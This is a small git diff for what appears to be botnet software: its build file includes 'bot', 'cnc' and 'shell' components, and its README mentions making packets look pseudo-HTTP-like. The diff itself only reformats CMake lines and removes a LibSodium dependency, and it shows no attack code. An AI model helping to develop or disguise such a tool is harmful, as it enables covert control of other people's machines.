diff --git a/CMakeLists.txt b/CMakeLists.txt index 6caa4f0..2578978 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -17,8 +17,8 @@ set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY ${CMAKE_SOURCE_DIR}/bin) #find_package(Sanitizers) if(NOT CMAKE_BUILD_TYPE) -set(CMAKE_BUILD_TYPE Release) -endif() + set(CMAKE_BUILD_TYPE Release) +endif () string(TOLOWER ${CMAKE_BUILD_TYPE} RAWCMAKEBUILDTYPE) message(STATUS "CMAKE_BUILD_TYPE: " ${RAWCMAKEBUILDTYPE}) @@ -46,4 +46,4 @@ if(NOT WIN32 AND (UNIX AND NOT APPLE)) add_subdirectory(bot) # windows support Soon:tm: add_subdirectory(cnc) add_subdirectory(shell) -endif() +endif () diff --git a/README.md b/README.md index c536e24..12dd8ab 100644 --- a/README.md +++ b/README.md @@ -41,7 +41,6 @@ I could add some padding to each packet to make it look pseudo-HTTP-like, howeve Make sure you have the following libraries and tools installed: - CMake (>=3.10) - Compiler with C11 support (GCC >= 4.7, Clang >= 3.1, etc.) -- LibSodium (static library) First, compile the target normally